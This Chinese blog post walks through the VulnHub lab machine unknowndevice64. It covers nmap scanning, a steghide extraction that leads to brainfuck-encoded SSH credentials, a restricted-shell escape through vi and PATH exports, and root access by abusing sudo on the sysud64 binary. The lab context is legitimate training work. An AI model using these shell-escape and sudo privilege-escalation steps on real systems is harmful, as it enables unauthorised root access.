当前位置: 首页 > article >正文

device靶机详解

靶机下载地址

https://www.vulnhub.com/entry/unknowndevice64-1,293/

靶机配置

主机发现

arp-scan -l

端口扫描

nmap -sV -A -T4 192.168.229.159

nmap -sS -Pn -A -p- -n 192.168.229.159

这段代码使用nmap工具对目标主机进行了端口扫描和服务探测。

-sS:使用SYN扫描方式进行端口扫描,它比默认的TCP扫描方式更快,因为它只发送SYN包而不发送其他数据包。

-Pn:禁用主机发现,即不发送ICMP Echo Request数据包来判断目标主机是否存活。

-A:启用操作系统探测、版本探测、脚本扫描和跟踪路由。

-p-:扫描所有65535个端口。

-n:不进行DNS解析,直接使用IP地址进行扫描。

192.168.229.159:目标主机的IP地址。

这段代码的目的是扫描目标主机开放的所有端口,并获取其操作系统类型、版本、服务等信息。

网页访问

http://192.168.229.159:31337/#

F12查看页面源码

发现隐藏目录key_is_h1dd3n.jpg

拼接访问

是个图片,猜测是个ctf隐写

http://192.168.229.159:31337/key_is_h1dd3n.jpg

下载图像,使用kali工具**steghid(开源隐写程序)**进行隐写!!!

steghide extract -sf key_is_h1dd3n.jpg

需要密码,猜测为h1ddsn,猜测成功

自动生成一个图片,复制到本机,使用在线工具https://copy.sh/brainfuck/,或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码;

https://copy.sh/brainfuck/

账户:ud64

密码:1M!#64@ud

目录扫描

dirb "http://192.168.229.159:31337"

GETshell

ssh连接

ssh ud64@192.168.229.159 -p 1337

提权

连按两下TAB键,查看当前用户权限,及可以使用的命令:

发现vi和 export命令可以使用

export命令用于设置或显示环境变量,在shell中执行程序时,shell会提供一组环境变量,export可新增,修改或删除环境变量

1、在vi编辑器中,输入 :!/bin/bash
在vi命令行下输入!/bin/bash即可顺利进入bash

2、通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:

在vi命令行下输入!/bin/bash即可顺利进入bash
通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
export PATH=/bin:$PATH

使用sudo sysud64 -h查看帮助消息,发现可以使用

-o file        send trace output to FILE instead of stderr

尝试将root用户的shell导出到该用户下

sudo sysud64 -o /dev/null /bin/sh

id
whoami

提权成功


http://www.kler.cn/a/318300.html

相关文章:

  • Python的Matplotlib
  • Vim 编辑器学习笔记
  • Ps:OpenColorIO 设置
  • 高效稳定!新加坡服务器托管方案助力企业全球化布局
  • 使用 Keras 训练一个卷积神经网络(CNN)(入门篇)
  • 专题十八_动态规划_斐波那契数列模型_路径问题_算法专题详细总结
  • 【C++ 基础数学 】2121. 2615相同元素的间隔之和|1760
  • 音频3A——初步了解音频3A
  • 【Python语言初识(一)】
  • [vulnhub] Hackademic.RTB1
  • 信息安全工程师(11)网络信息安全科技信息获取
  • 前端vue-作用域插槽的传值,子传父,父用obj对象接收
  • 服务设计原则介绍
  • html+css(交河故城css)
  • Python基于flask框架的智能停车场车位系统 数据可视化分析系统fyfc81
  • 【Windows 同时安装 MySQL5 和 MySQL8 - 详细图文教程】
  • Android15之源码分支qpr、dp、beta、r1含义(二百三十二)
  • 深度学习01-概述
  • JS 特殊运算符有哪些?
  • YOLOv8——测量高速公路上汽车的速度
  • Python一分钟:装饰器
  • 【Linux探索学习】第一弹——Linux的基本指令(上)——开启Linux学习第一篇
  • SpringCloud微服务消息驱动的实践指南
  • 环境部署-环境变量
  • LeetCode - 2207. 字符串中最多数目的子序列
  • 【推文制作】秀米简明教程 1.0